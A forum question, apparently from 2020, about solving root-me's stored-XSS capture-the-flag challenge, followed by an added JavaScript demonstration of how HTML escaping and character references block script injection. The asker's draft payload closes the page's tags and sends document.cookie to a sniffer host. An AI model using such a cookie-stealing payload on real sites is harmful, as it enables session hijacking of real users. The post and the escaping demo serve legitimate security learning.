JavaScript

HexUserHex, 2020-04-30 12:47:32

Question for CTF (XSS) fans

Good afternoon,
I'm slowly working through the CTF challenge (XSS - Stored 2) on root-me. As usual, the task is to steal the admin's cookies, because at the time this challenge was created there was no 'HttpOnly' flag yet. So I found an input that seems to let all characters through, which I immediately checked by feeding it this:
'';!--"<fuck>=&{()}

Then I tried inserting the usual alert(), pressed F12 and went to look where exactly (between which tags) the backend had put it...
<script>alert(1)</alert>

<html><head>
  <title>Forum v0.002</title>
  <style>
      .invite { color: green; }
      .admin { color: red;}
  </style>
    </head>
   <body><link rel="stylesheet" property="stylesheet" id="s" type="text/css" href="/template/s.css" media="all"><iframe id="iframe" src="https://www.root-me.org/?page=externe_header"></iframe>
        <h1>Forum v0.002</h1>
  <hr>
  
  <div>
      <span><a href="./?section=admin">admin</a></span>
      <span style="text-align: right; float:right;">Statut / Status : <i class="invite">invite</i></span>
  </div><br>



  <b>message enregistré / content saved</b><br><br>        <form action="" method="POST">
          <div>
              Titre / Title&nbsp;:<br>
              <input name="titre" value="" type="text">
          </div><br>
          <div>
              Message / Content&nbsp;:<br>
              <textarea name="message" rows="3" cols="50"></textarea>
          </div>
          <div>
              <input value="envoyer / send" type="submit">
          </div>
        </form><br><br>
        <div>
          <div>Posted messages:</div><br>
    <span><b>Welcome</b></span><br>
    <span>N'hésitez pas à me laisser un message / Don't hesitate, let a message</span><br><hr>
    <span><b>test_filter</b>&nbsp;(<i class="invite">status : invite</i>)</span><br><span>'';!--"&lt;fuck&gt;=&amp;{()} </span><br><hr>
        </div>
    

</body></html>


And I find my JS code at the end:
&lt;script&gt;alert(1)&lt;/alert&gt;

1. Attention, the most important question: as far as I understand, the browser replaced the special characters in my request with special codes (I'd be glad if you told me their name) which, by definition, will NEVER be processed as HTML, but will be rendered successfully by the browser?

2. If so, what should my so-called payload be translated into so that the backend 'passes' all the characters through and they are processed as HTML/JS code?

3. Another question (I'm not sure I'll phrase it correctly): in what form do browsers process this data? That is, can I encode the usual HTML/JS code in ASCII, or UTF-8, or URL-encoding, or hex in general... and the browser will automatically interpret and display my HTML without any problems?

As soon as I solve this problem, as far as I understand, it will be necessary to close all the enclosing tags, so to speak, and then just insert my JS payload; at the moment I've arrived at this option:

</span></br></div><script>document.location.href = 'https://mysniffer?cookies=' + document.cookie;</script><div><span>


PS: I know I could always look at a writeup, but I'm interested in understanding it :)
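As an added illustration (not part of the original post or of root-me's code), here is a small JavaScript model of the round trip the posted message takes: the browser URL-encodes the form body, the server URL-decodes it, escapes `&`, `<` and `>` on output, and drops the result into a `<span>`, which is consistent with the response shown above but is an assumption about the challenge's server. The point it demonstrates is how an HTML parser handles character references (what the `&lt;`/`&gt;` codes are called): tag boundaries are found on the raw characters first, and references are decoded only inside the text that is left, so an escaped `<` can never open a tag, and URL- or hex-encoding the payload changes nothing because those layers are decoded before the escaping step runs.

```javascript
// Added example: a toy model of message -> server -> HTML parser.
// Constructed for illustration only; the challenge's real server code is not known.

// 1. Output encoding in text (element-content) context, matching what the
//    response above shows: '<', '>' and '&' become character references.
const TEXT_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;' };
function escapeHtmlText(text) {
  return text.replace(/[&<>]/g, ch => TEXT_ENTITIES[ch]);
}

// 2. Character-reference decoding as the HTML parser does it:
//    named (&lt;), decimal (&#60;) and hexadecimal (&#x3c;) forms.
const NAMED_REFS = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
function decodeCharRefs(text) {
  return text.replace(/&(#x([0-9a-f]+)|#([0-9]+)|([a-z]+));/gi, (m, _g, hex, dec, name) => {
    if (hex) return String.fromCodePoint(parseInt(hex, 16));
    if (dec) return String.fromCodePoint(parseInt(dec, 10));
    return NAMED_REFS[name.toLowerCase()] ?? m; // unknown name: left as literal text
  });
}

// 3. A deliberately minimal tokenizer with the one property that matters here:
//    tags are recognised on the raw markup FIRST; references are decoded only in
//    the text runs between them. A '<' written as &lt; is already plain text by
//    the time it is decoded and can never start a tag.
function tokenize(html) {
  const tokens = [];
  const tagRe = /<\/?([a-zA-Z][a-zA-Z0-9]*)[^>]*>/g;
  let last = 0, m;
  while ((m = tagRe.exec(html)) !== null) {
    if (m.index > last) tokens.push({ type: 'text', value: decodeCharRefs(html.slice(last, m.index)) });
    tokens.push({ type: m[0][1] === '/' ? 'endTag' : 'startTag', name: m[1].toLowerCase() });
    last = tagRe.lastIndex;
  }
  if (last < html.length) tokens.push({ type: 'text', value: decodeCharRefs(html.slice(last)) });
  return tokens;
}

// 4. The assumed pipeline: form body (URL-encoded by the browser) -> server
//    URL-decodes and stores -> escaped on output -> wrapped in the forum's <span>.
//    `escape: false` models the same sink without output encoding, for contrast.
function renderMessage(postedBody, { escape = true } = {}) {
  const stored = decodeURIComponent(postedBody);          // what the server stores
  const shown = escape ? escapeHtmlText(stored) : stored; // what goes into the page
  const html = `<span>${shown} </span>`;
  const tokens = tokenize(html);
  return {
    html,
    scriptTags: tokens.filter(t => t.type === 'startTag' && t.name === 'script').length,
    visibleText: tokens.filter(t => t.type === 'text').map(t => t.value).join(''),
  };
}

// Constructed inputs: the asker's probe and alert() as the browser would POST them,
// the same payload pre-encoded as hex references, and the unescaped sink.
const probe = renderMessage("'';!--\"<fuck>=&{()}");
const alertPost = renderMessage('%3Cscript%3Ealert(1)%3C/alert%3E');
const hexRefs = renderMessage('&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;');
const unescaped = renderMessage('%3Cscript%3Ealert(1)%3C/script%3E', { escape: false });
console.log(probe.html);      // reproduces the stored <span> seen in the response above
console.log(alertPost);       // 0 script tags; the visible text is the literal "<script>..."
console.log(hexRefs);         // 0 script tags; the visible text is the literal "&#x3c;script..."
console.log(unescaped.scriptTags); // 1: only the missing escaping step changes the outcome
```

Running it shows that every encoding variant the question mentions arrives at the server as the same plain characters (form decoding happens before storage), so after `escapeHtmlText` the page contains only text nodes; even `&#x3c;` typed literally is neutralised because `&` itself is escaped to `&amp;`. What would change the outcome is not a different encoding of the same payload but a sink that skips or misorders the escaping, or a different context (an attribute value or a script block, where the three-character text escaping above is not sufficient); the response quoted in the post shows only a text-node sink, so nothing here claims such a sink exists in the challenge.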
